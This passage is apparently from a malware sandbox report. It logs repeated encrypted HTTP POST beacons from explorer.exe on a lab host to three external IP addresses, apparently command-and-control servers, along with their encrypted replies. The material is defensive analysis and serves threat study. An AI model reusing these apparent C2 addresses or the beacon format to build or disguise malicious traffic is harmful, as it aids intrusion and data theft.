                                                          2024-07-19 11:46:36 UTC685INData Raw: 68 38 6f 57 61 78 38 6d 4a 68 53 6c 37 63 79 75 4e 35 4b 73 55 37 52 35 4e 6b 4c 6e 6e 36 63 32 74 70 31 62 63 42 62 37 6f 61 6b 45 78 64 73 77 5a 64 65 62 30 67 4b 58 47 49 42 72 2b 42 54 6c 73 49 6f 55 48 4a 51 53 73 4d 47 72 48 66 66 4a 67 61 74 47 4d 39 51 58 73 71 6b 52 4a 65 49 72 52 64 55 70 36 5a 74 45 42 38 2f 34 6e 4b 68 2b 64 62 64 62 32 49 54 4e 57 70 64 56 56 59 59 30 57 39 59 79 73 53 57 63 42 33 71 2b 74 6b 6c 2b 6d 36 48 4a 4e 6e 72 30 45 48 59 38 4a 57 77 41 34 6d 49 36 34 74 4a 38 72 67 6e 6a 4d 49 4c 7a 4b 67 56 4f 35 53 55 6b 67 34 62 33 37 2f 78 55 34 67 71 58 76 63 43 4d 6d 4e 35 34 35 39 4e 6c 30 43 41 54 47 78 68 37 59 6f 39 4a 62 51 53 33 52 70 77 38 5a 6c 48 74 41 6c 41 44 42 73 38 39 42 55 53 4d 32 36 65 75 79 4b 74 6a 67 42 58
                                                          Data Ascii: h8oWax8mJhSl7cyuN5KsU7R5NkLnn6c2tp1bcBb7oakExdswZdeb0gKXGIBr+BTlsIoUHJQSsMGrHffJgatGM9QXsqkRJeIrRdUp6ZtEB8/4nKh+dbdb2ITNWpdVVYY0W9YysSWcB3q+tkl+m6HJNnr0EHY8JWwA4mI64tJ8rgnjMILzKgVO5SUkg4b37/xU4gqXvcCMmN5459Nl0CATGxh7Yo9JbQS3Rpw8ZlHtAlADBs89BUSM26euyKtjgBX


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          69192.168.2.557876167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:37 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:37 UTC1122OUTData Raw: 5a 39 4a 6c 70 69 64 37 53 79 38 50 61 61 5a 6d 39 42 72 49 37 6c 35 45 2f 48 44 5a 6a 73 46 50 77 6d 4f 74 30 47 4b 47 73 79 4e 70 66 66 78 61 4a 4f 72 79 6c 4b 34 6a 45 49 4b 74 4b 65 77 34 52 71 4e 59 6c 2b 2b 44 53 4a 73 38 74 34 6d 41 53 79 4e 31 77 6e 6b 4a 4c 6e 31 37 30 46 71 58 51 62 78 72 4f 75 4b 62 2b 53 57 7a 77 2f 47 78 43 75 79 59 70 65 42 36 5a 72 69 67 49 6a 71 73 41 74 2b 32 70 45 2b 4b 4d 51 49 47 2b 70 73 4b 70 48 6f 64 6e 70 32 50 38 63 50 6c 56 34 63 48 51 41 46 2f 55 33 4c 2f 68 58 51 2f 78 2f 4c 78 65 63 7a 70 46 38 32 58 65 78 4a 43 46 4f 37 41 4b 37 68 38 39 4b 59 50 53 74 66 70 6b 56 79 6f 76 63 4d 36 4a 52 6b 38 74 56 70 64 69 48 34 65 52 33 5a 2f 2b 43 5a 57 6c 6e 68 56 4f 67 2f 38 62 30 36 53 72 4d 70 53 64 6d 37 63 51 71 45
                                                          Data Ascii: Z9Jlpid7Sy8PaaZm9BrI7l5E/HDZjsFPwmOt0GKGsyNpffxaJOrylK4jEIKtKew4RqNYl++DSJs8t4mASyN1wnkJLn170FqXQbxrOuKb+SWzw/GxCuyYpeB6ZrigIjqsAt+2pE+KMQIG+psKpHodnp2P8cPlV4cHQAF/U3L/hXQ/x/LxeczpF82XexJCFO7AK7h89KYPStfpkVyovcM6JRk8tVpdiH4eR3Z/+CZWlnhVOg/8b06SrMpSdm7cQqE
                                                          2024-07-19 11:46:38 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:38 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:38 UTC685INData Raw: 46 51 6a 6f 75 56 57 70 50 2b 4a 47 61 6f 31 4c 78 34 6b 38 47 62 52 71 6b 5a 79 51 37 67 38 41 76 44 64 76 58 51 75 51 47 6c 65 71 63 79 37 32 6f 31 57 54 6e 32 57 7a 2b 36 66 65 39 57 35 6a 52 56 5a 6e 69 41 7a 54 43 75 57 79 48 57 30 52 58 2b 54 47 65 32 32 75 6c 78 64 58 6d 6d 45 4a 6c 65 4a 4f 33 51 6a 4a 74 46 57 41 71 37 6b 4a 67 55 6e 32 6e 39 56 6a 6f 61 39 79 35 41 66 41 62 65 50 6c 6e 33 6e 59 62 54 75 55 66 52 6e 32 43 78 4c 4e 6c 69 53 69 6d 68 36 42 41 77 48 41 57 4b 39 64 76 54 5a 41 65 68 59 32 70 50 50 44 61 73 46 43 54 72 38 62 33 34 4f 62 68 43 41 54 67 47 38 2b 46 5a 75 63 49 63 64 41 75 6b 58 2f 37 39 66 31 31 53 47 30 6a 47 41 36 38 4b 67 43 32 73 64 41 52 70 68 6a 36 7a 4e 65 61 51 44 63 75 57 34 4a 6e 63 4b 45 57 6f 79 38 51 6f 4a
                                                          Data Ascii: FQjouVWpP+JGao1Lx4k8GbRqkZyQ7g8AvDdvXQuQGleqcy72o1WTn2Wz+6fe9W5jRVZniAzTCuWyHW0RX+TGe22ulxdXmmEJleJO3QjJtFWAq7kJgUn2n9Vjoa9y5AfAbePln3nYbTuUfRn2CxLNliSimh6BAwHAWK9dvTZAehY2pPPDasFCTr8b34ObhCATgG8+FZucIcdAukX/79f11SG0jGA68KgC2sdARphj6zNeaQDcuW4JncKEWoy8QoJ


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          70192.168.2.557877107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:39 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:39 UTC1122OUTData Raw: 72 59 4b 75 76 4e 35 38 39 32 4f 6a 2b 35 4d 4c 45 34 6e 59 32 62 51 45 54 5a 65 34 32 44 4c 4e 53 44 61 69 32 78 58 53 43 62 6f 51 62 4c 4d 51 74 39 41 38 68 64 6a 74 44 70 68 43 6f 4f 66 72 50 6b 57 43 57 32 71 6b 44 48 58 68 56 58 33 76 68 2b 53 69 39 64 35 39 2f 64 7a 74 2b 42 4c 4f 43 4a 6d 74 58 35 2f 53 6d 46 44 72 4c 4b 67 76 50 43 6e 4f 38 4e 31 58 74 70 34 73 6c 49 74 64 51 76 57 4c 34 65 78 57 62 35 73 33 61 78 4f 42 64 41 76 38 4d 52 56 2f 41 46 66 33 79 4b 6e 6b 63 78 78 78 51 4c 79 63 4e 77 54 53 44 33 4e 71 7a 58 61 64 4a 48 6e 61 55 78 56 33 59 63 56 6a 73 63 4b 4d 72 41 73 36 6c 76 4e 55 52 31 4e 68 2f 36 79 72 53 49 57 5a 78 65 38 46 56 58 46 59 4a 51 50 42 4d 42 41 37 79 58 47 56 7a 56 62 5a 6a 50 57 31 33 56 6f 79 76 78 37 64 6c 77 77
                                                          Data Ascii: rYKuvN5892Oj+5MLE4nY2bQETZe42DLNSDai2xXSCboQbLMQt9A8hdjtDphCoOfrPkWCW2qkDHXhVX3vh+Si9d59/dzt+BLOCJmtX5/SmFDrLKgvPCnO8N1Xtp4slItdQvWL4exWb5s3axOBdAv8MRV/AFf3yKnkcxxxQLycNwTSD3NqzXadJHnaUxV3YcVjscKMrAs6lvNUR1Nh/6yrSIWZxe8FVXFYJQPBMBA7yXGVzVbZjPW13Voyvx7dlww
                                                          2024-07-19 11:46:40 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:40 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:40 UTC685INData Raw: 4c 47 42 73 6e 62 57 49 63 61 4d 36 65 6b 51 72 56 72 63 5a 46 45 37 73 68 50 6e 52 5a 42 54 36 32 61 70 66 65 48 61 4b 46 50 73 7a 44 54 59 42 68 6c 77 6b 62 44 37 53 6b 71 6d 67 39 47 79 58 59 54 6b 70 52 2b 6e 32 4d 4c 43 4a 48 68 4b 65 6c 46 6a 46 35 30 33 49 77 63 4a 64 51 47 33 68 31 72 46 30 6c 37 64 6a 32 78 2b 2b 4d 31 38 52 4c 57 33 58 74 54 44 32 45 59 75 69 67 62 72 76 2b 74 62 7a 50 35 73 34 79 4b 45 37 6e 4e 63 33 57 6a 50 65 68 62 6e 2f 71 35 49 64 70 4b 75 45 58 6d 50 41 4a 76 30 58 58 54 73 42 68 4e 71 62 54 43 53 79 56 65 44 33 43 42 71 70 47 45 50 51 64 77 6c 36 64 4a 33 6a 78 73 65 66 7a 64 77 68 43 49 52 43 45 68 74 35 36 73 68 76 44 56 68 41 66 48 78 70 76 53 4a 30 33 47 6f 55 30 5a 39 64 57 43 51 76 56 4f 2b 36 62 46 67 70 6c 6d 37
                                                          Data Ascii: LGBsnbWIcaM6ekQrVrcZFE7shPnRZBT62apfeHaKFPszDTYBhlwkbD7Skqmg9GyXYTkpR+n2MLCJHhKelFjF503IwcJdQG3h1rF0l7dj2x++M18RLW3XtTD2EYuigbrv+tbzP5s4yKE7nNc3WjPehbn/q5IdpKuEXmPAJv0XXTsBhNqbTCSyVeD3CBqpGEPQdwl6dJ3jxsefzdwhCIRCEht56shvDVhAfHxpvSJ03GoU0Z9dWCQvVO+6bFgplm7


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          71192.168.2.557879107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:41 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:46:41 UTC1267OUTData Raw: 45 50 65 78 79 78 72 30 52 50 68 58 51 44 2b 45 4a 58 74 79 6c 6d 56 2b 4e 75 68 43 6e 4d 2f 43 59 71 68 58 37 4b 34 6f 74 51 76 57 47 77 76 51 57 4a 49 38 7a 73 6d 6f 43 66 4b 6e 6a 58 31 50 6f 6b 57 66 50 68 58 44 4e 38 65 78 58 47 4d 61 35 42 48 32 71 44 4e 36 39 77 73 78 2f 53 56 70 31 71 63 38 47 6d 56 72 35 4e 77 6c 30 2f 70 6a 4f 37 6e 6d 71 34 7a 73 44 4e 7a 67 44 6e 58 2b 36 6b 77 47 65 6f 5a 38 7a 6b 78 31 45 65 56 45 44 63 4b 78 54 63 48 46 68 76 58 71 44 4d 71 72 37 59 44 62 6a 46 44 59 6a 4f 77 56 45 47 41 68 58 48 43 6d 4f 73 75 72 64 65 37 35 72 34 71 30 78 56 6d 4a 43 6b 52 4b 69 5a 39 4f 49 67 4e 47 54 50 47 35 54 51 52 7a 72 49 44 33 59 36 55 41 56 4b 33 6b 6f 43 55 50 47 77 4b 63 4f 62 30 67 66 52 35 54 41 72 72 50 54 52 35 57 61 6c 38
                                                          Data Ascii: EPexyxr0RPhXQD+EJXtylmV+NuhCnM/CYqhX7K4otQvWGwvQWJI8zsmoCfKnjX1PokWfPhXDN8exXGMa5BH2qDN69wsx/SVp1qc8GmVr5Nwl0/pjO7nmq4zsDNzgDnX+6kwGeoZ8zkx1EeVEDcKxTcHFhvXqDMqr7YDbjFDYjOwVEGAhXHCmOsurde75r4q0xVmJCkRKiZ9OIgNGTPG5TQRzrID3Y6UAVK3koCUPGwKcOb0gfR5TArrPTR5Wal8
                                                          2024-07-19 11:46:42 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:42 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:42 UTC685INData Raw: 32 46 67 51 79 5a 65 77 75 30 43 56 30 61 77 4c 66 5a 33 50 79 4f 6b 75 70 6e 53 42 35 38 31 57 32 44 53 54 33 44 48 31 6e 41 4d 4a 59 53 32 70 62 59 70 6d 44 4b 73 44 2b 38 6e 55 4b 52 65 73 79 31 5a 4b 4f 34 66 77 6b 58 71 53 66 6f 66 68 48 49 2b 43 71 79 71 70 63 70 76 37 65 44 34 58 2f 74 57 4a 65 51 6b 30 4a 52 7a 6e 69 52 72 70 68 4b 6f 47 39 4e 73 69 68 34 78 41 31 4a 2b 52 36 51 35 38 58 44 77 4c 50 39 72 7a 4d 4e 67 2b 4e 74 39 68 6c 5a 6c 61 31 4b 78 4e 4b 5a 69 56 6c 6c 6d 31 6f 5a 41 6f 63 78 56 30 37 2b 6b 68 4e 4b 61 31 31 39 6b 64 6a 56 41 64 79 72 32 52 54 49 63 78 4a 4b 62 74 72 61 61 4d 73 75 62 37 66 2f 30 4e 43 36 6d 34 43 6a 66 4d 7a 4b 73 43 73 63 2b 58 54 69 72 50 79 59 63 53 6a 4f 55 57 50 55 52 6e 65 36 56 42 6c 46 51 7a 42 4c 45
                                                          Data Ascii: 2FgQyZewu0CV0awLfZ3PyOkupnSB581W2DST3DH1nAMJYS2pbYpmDKsD+8nUKResy1ZKO4fwkXqSfofhHI+Cqyqpcpv7eD4X/tWJeQk0JRzniRrphKoG9Nsih4xA1J+R6Q58XDwLP9rzMNg+Nt9hlZla1KxNKZiVllm1oZAocxV07+khNKa119kdjVAdyr2RTIcxJKbtraaMsub7f/0NC6m4CjfMzKsCsc+XTirPyYcSjOUWPURne6VBlFQzBLE


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          72192.168.2.557880167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:43 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:43 UTC1122OUTData Raw: 55 4b 36 6b 66 68 52 53 62 54 52 54 74 39 4f 37 61 38 6a 33 68 2b 72 6f 68 55 59 64 71 5a 64 75 4c 45 4c 52 45 46 34 64 4a 43 4a 4b 62 49 52 4d 58 68 78 6e 57 71 42 7a 63 30 64 56 58 58 6d 37 54 58 77 39 75 58 6d 48 65 33 76 2b 38 2b 4a 67 69 6e 6c 45 58 56 4b 76 48 6e 66 62 71 6f 44 78 4e 56 53 48 43 6d 36 77 56 69 56 4c 7a 4b 65 7a 75 61 73 64 44 57 62 6b 33 4a 47 4c 31 63 66 41 62 34 54 77 53 72 44 31 6a 30 6e 71 61 32 4c 4b 38 6a 54 65 35 53 49 51 74 6b 62 4d 46 77 66 56 62 71 55 72 37 44 47 35 4c 66 55 77 37 54 44 66 4b 6b 2f 67 56 36 44 49 46 4d 4b 49 49 71 45 51 66 6e 35 51 47 52 70 51 4c 77 6b 7a 2b 6a 4d 45 49 63 39 78 33 73 68 51 31 66 44 74 39 48 4d 6b 67 77 4c 50 34 69 47 30 36 79 6e 32 4a 76 76 59 59 74 4c 66 4f 2f 31 56 2b 51 67 61 6b 37 62
                                                          Data Ascii: UK6kfhRSbTRTt9O7a8j3h+rohUYdqZduLELREF4dJCJKbIRMXhxnWqBzc0dVXXm7TXw9uXmHe3v+8+JginlEXVKvHnfbqoDxNVSHCm6wViVLzKezuasdDWbk3JGL1cfAb4TwSrD1j0nqa2LK8jTe5SIQtkbMFwfVbqUr7DG5LfUw7TDfKk/gV6DIFMKIIqEQfn5QGRpQLwkz+jMEIc9x3shQ1fDt9HMkgwLP4iG06yn2JvvYYtLfO/1V+Qgak7b
                                                          2024-07-19 11:46:44 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:44 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:44 UTC685INData Raw: 62 4c 57 7a 65 48 4f 64 75 4e 4c 43 47 30 6b 39 78 50 56 65 41 79 35 4f 35 77 68 4c 62 30 78 33 61 58 6b 65 48 7a 58 43 70 6c 4d 36 59 63 58 33 4b 45 4e 35 52 54 71 70 74 77 75 68 66 4c 2f 78 55 6b 78 39 66 76 31 52 53 39 6b 61 4a 56 66 50 37 69 33 4e 6b 5a 37 74 2b 49 36 4a 47 33 41 79 50 44 2b 6e 70 2b 64 42 79 4c 33 2f 59 52 61 64 65 4b 37 4d 68 73 35 32 7a 46 45 73 75 67 43 35 64 58 39 51 65 45 42 6f 70 48 74 58 73 4e 2b 76 42 33 56 48 51 38 58 57 37 6e 6b 7a 34 4f 37 57 64 54 47 32 50 37 6c 4d 48 75 48 64 4f 46 5a 45 63 41 51 38 39 69 42 30 4e 35 36 2b 42 50 50 31 4f 43 68 52 61 5a 51 49 4e 32 37 6d 38 49 4e 2b 73 42 52 48 30 6c 6b 71 2b 58 44 73 48 53 52 4e 6a 46 62 75 72 70 65 58 4b 70 47 4a 39 5a 53 75 69 64 57 2b 34 69 33 6a 31 4a 4a 36 46 4b 6d
                                                          Data Ascii: bLWzeHOduNLCG0k9xPVeAy5O5whLb0x3aXkeHzXCplM6YcX3KEN5RTqptwuhfL/xUkx9fv1RS9kaJVfP7i3NkZ7t+I6JG3AyPD+np+dByL3/YRadeK7Mhs52zFEsugC5dX9QeEBopHtXsN+vB3VHQ8XW7nkz4O7WdTG2P7lMHuHdOFZEcAQ89iB0N56+BPP1OChRaZQIN27m8IN+sBRH0lkq+XDsHSRNjFburpeXKpGJ9ZSuidW+4i3j1JJ6FKm


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          73192.168.2.557881107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:45 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:45 UTC1122OUTData Raw: 63 47 70 74 79 46 58 36 59 37 2f 4c 77 57 2b 50 78 42 4c 66 79 75 4b 73 75 59 73 42 63 5a 71 4b 35 38 48 61 33 7a 64 4a 73 37 4d 4d 34 73 2f 35 64 7a 6c 6f 34 62 58 71 38 74 7a 74 74 57 72 37 34 53 32 4d 54 6a 4a 44 36 37 50 52 70 56 45 6b 7a 47 4f 47 6e 34 38 79 64 5a 54 4b 4c 35 54 53 6d 50 68 54 6d 53 54 45 35 39 77 4c 55 4a 70 2f 68 4a 61 62 4f 4f 2b 50 48 56 50 6b 44 52 65 64 52 37 69 6c 70 74 53 47 43 63 61 35 69 62 4b 37 37 38 2f 6d 78 70 61 44 30 70 52 6c 4f 67 75 75 6b 71 6a 62 79 77 63 67 47 4d 6a 31 38 48 56 6a 4b 78 69 37 4f 54 63 5a 55 63 65 54 74 35 5a 56 57 64 67 2b 71 50 2b 70 77 6b 79 44 48 74 61 44 58 33 33 4e 4d 34 79 4a 32 56 77 4e 79 57 38 68 7a 43 64 4d 67 51 35 6a 33 4d 6d 71 47 50 4c 67 72 57 30 72 4f 30 68 4f 6a 36 39 51 42 56 59
                                                          Data Ascii: cGptyFX6Y7/LwW+PxBLfyuKsuYsBcZqK58Ha3zdJs7MM4s/5dzlo4bXq8tzttWr74S2MTjJD67PRpVEkzGOGn48ydZTKL5TSmPhTmSTE59wLUJp/hJabOO+PHVPkDRedR7ilptSGCca5ibK778/mxpaD0pRlOguukqjbywcgGMj18HVjKxi7OTcZUceTt5ZVWdg+qP+pwkyDHtaDX33NM4yJ2VwNyW8hzCdMgQ5j3MmqGPLgrW0rO0hOj69QBVY
                                                          2024-07-19 11:46:46 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:46 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:46 UTC685INData Raw: 65 61 4e 59 5a 37 6b 50 37 4c 2b 56 4d 6e 6e 38 36 72 31 33 46 76 61 73 69 61 6b 68 71 42 6b 44 6e 71 6e 2b 73 79 49 73 49 37 49 44 33 79 6a 4c 44 70 39 73 79 55 51 48 64 64 4b 71 52 72 46 73 66 6f 61 75 50 6c 63 57 48 47 56 46 35 55 35 36 58 2f 73 7a 6c 75 4d 57 74 36 6d 33 47 50 42 48 2f 4f 4c 4a 35 49 43 70 4c 70 2f 46 50 6d 2f 58 36 30 6b 70 73 72 78 47 45 58 2b 45 44 48 68 45 68 69 64 69 4f 38 35 52 30 32 4f 65 49 58 46 64 34 64 74 58 79 51 2f 58 39 50 30 30 67 65 4d 4c 79 6a 50 68 45 4f 66 4b 2f 71 54 2b 54 74 65 55 4e 69 50 30 70 48 7a 6e 77 75 32 65 62 35 72 2b 63 39 7a 4b 4d 43 69 6e 4f 35 71 4a 65 6c 53 57 59 6a 41 5a 37 66 6a 4a 7a 7a 65 35 76 46 72 54 38 6f 48 45 43 62 4c 41 68 2f 4e 6d 6e 7a 6f 53 54 35 6f 2b 32 63 59 63 76 77 64 44 49 52 53
                                                          Data Ascii: eaNYZ7kP7L+VMnn86r13FvasiakhqBkDnqn+syIsI7ID3yjLDp9syUQHddKqRrFsfoauPlcWHGVF5U56X/szluMWt6m3GPBH/OLJ5ICpLp/FPm/X60kpsrxGEX+EDHhEhidiO85R02OeIXFd4dtXyQ/X9P00geMLyjPhEOfK/qT+TteUNiP0pHznwu2eb5r+c9zKMCinO5qJelSWYjAZ7fjJzze5vFrT8oHECbLAh/NmnzoST5o+2cYcvwdDIRS


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          74192.168.2.557883107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:47 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:46:47 UTC1267OUTData Raw: 69 74 59 4a 46 4e 71 67 55 31 73 69 67 5a 67 2b 31 75 46 4e 6a 43 2b 6c 2b 37 47 51 56 34 32 49 37 53 2f 75 59 47 71 72 73 4e 69 79 50 64 78 74 7a 77 56 54 4e 6a 48 6d 6f 65 64 6f 62 37 78 32 55 44 73 39 30 6c 4a 72 42 6e 52 67 66 76 38 63 2f 76 39 58 4b 4f 57 32 31 6f 56 74 6c 30 64 42 31 70 77 67 74 33 45 76 37 65 6c 34 71 56 4d 7a 44 2f 75 55 7a 59 2b 2f 73 48 34 79 48 2f 6b 6a 65 75 4f 55 62 72 52 31 57 51 49 2f 52 2f 37 36 67 6d 56 6f 41 41 59 38 58 41 4c 59 70 52 67 51 70 49 4b 39 4b 4b 64 31 37 41 6e 6b 67 77 39 44 68 44 79 66 56 6e 62 4a 72 42 53 2f 51 4a 6e 57 35 4e 79 36 36 58 75 4c 67 38 73 68 73 2f 30 61 5a 6a 47 55 51 41 74 7a 45 2f 37 2b 33 45 48 2b 6d 34 45 53 72 2b 57 34 77 72 51 2f 36 62 6b 67 35 4a 38 51 76 4b 32 33 4f 34 48 4c 55 34 49
                                                          Data Ascii: itYJFNqgU1sigZg+1uFNjC+l+7GQV42I7S/uYGqrsNiyPdxtzwVTNjHmoedob7x2UDs90lJrBnRgfv8c/v9XKOW21oVtl0dB1pwgt3Ev7el4qVMzD/uUzY+/sH4yH/kjeuOUbrR1WQI/R/76gmVoAAY8XALYpRgQpIK9KKd17Ankgw9DhDyfVnbJrBS/QJnW5Ny66XuLg8shs/0aZjGUQAtzE/7+3EH+m4ESr+W4wrQ/6bkg5J8QvK23O4HLU4I
                                                          2024-07-19 11:46:48 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:48 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:48 UTC685INData Raw: 50 4d 35 76 52 43 6c 72 33 6f 4f 78 35 51 76 70 4b 59 48 49 6e 6b 2f 49 64 77 70 53 36 39 75 31 50 79 4d 59 67 2b 44 45 62 78 5a 74 33 68 31 41 5a 65 67 36 54 73 48 64 76 44 6a 6f 32 32 4d 68 35 74 39 2f 36 69 6a 39 54 36 4b 50 32 74 42 32 70 32 36 36 56 44 6c 2f 48 4f 6a 49 31 70 2b 4f 56 59 51 44 75 53 72 54 59 30 42 70 50 66 44 45 45 71 4d 79 38 64 50 39 6a 36 61 77 64 4e 6e 4a 31 36 2f 70 6c 56 49 41 7a 65 64 52 6a 66 42 62 35 4a 67 71 31 49 34 74 6c 43 54 30 42 38 77 4c 32 52 39 53 46 78 63 59 4f 68 2b 75 59 56 46 69 75 4a 69 65 66 6a 64 46 59 7a 4e 2f 79 57 2b 6f 73 56 5a 4d 6d 5a 64 30 38 79 55 2b 52 42 53 72 61 75 32 34 56 74 2b 2f 31 51 37 67 4b 58 53 52 39 48 2f 55 5a 4b 57 4f 75 59 2b 41 64 41 45 59 73 57 6c 38 79 31 64 33 79 79 4c 63 66 49 31
                                                          Data Ascii: PM5vRClr3oOx5QvpKYHInk/IdwpS69u1PyMYg+DEbxZt3h1AZeg6TsHdvDjo22Mh5t9/6ij9T6KP2tB2p266VDl/HOjI1p+OVYQDuSrTY0BpPfDEEqMy8dP9j6awdNnJ16/plVIAzedRjfBb5Jgq1I4tlCT0B8wL2R9SFxcYOh+uYVFiuJiefjdFYzN/yW+osVZMmZd08yU+RBSrau24Vt+/1Q7gKXSR9H/UZKWOuY+AdAEYsWl8y1d3yyLcfI1


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          75192.168.2.557884167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:49 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:49 UTC1122OUTData Raw: 59 45 48 34 32 4c 38 41 77 66 35 32 52 43 52 32 64 4a 74 6c 62 32 36 64 44 4e 32 62 69 43 78 36 35 61 50 4b 6e 68 77 57 70 32 74 4f 51 31 38 5a 45 71 45 52 45 39 58 4a 71 4b 77 78 74 7a 54 2b 74 39 6a 37 75 35 56 44 50 30 31 52 50 68 67 44 59 5a 76 55 57 4f 76 54 52 75 35 45 34 48 42 66 65 35 76 57 70 66 6b 48 2f 76 63 53 4b 32 34 37 32 65 64 2b 58 58 36 6b 6d 30 68 6f 6b 4c 58 70 38 4c 49 4d 54 4c 43 70 7a 2b 42 4e 49 42 6a 5a 39 5a 6f 43 5a 6a 54 36 77 4a 61 2f 51 41 42 69 47 6e 71 47 6a 2f 74 66 47 47 47 55 4a 69 63 6f 51 73 6d 74 4e 45 36 75 31 71 61 61 48 35 51 30 77 75 38 51 51 6e 43 44 76 59 34 5a 6c 56 6a 54 2b 44 61 79 64 79 62 38 46 42 47 4b 6d 61 51 65 42 57 70 78 66 32 50 74 4a 51 42 71 6f 6e 4e 44 39 34 36 7a 51 64 4b 58 31 7a 30 4b 39 66 65
                                                          Data Ascii: YEH42L8Awf52RCR2dJtlb26dDN2biCx65aPKnhwWp2tOQ18ZEqERE9XJqKwxtzT+t9j7u5VDP01RPhgDYZvUWOvTRu5E4HBfe5vWpfkH/vcSK2472ed+XX6km0hokLXp8LIMTLCpz+BNIBjZ9ZoCZjT6wJa/QABiGnqGj/tfGGGUJicoQsmtNE6u1qaaH5Q0wu8QQnCDvY4ZlVjT+Daydyb8FBGKmaQeBWpxf2PtJQBqonND946zQdKX1z0K9fe
                                                          2024-07-19 11:46:50 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:50 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
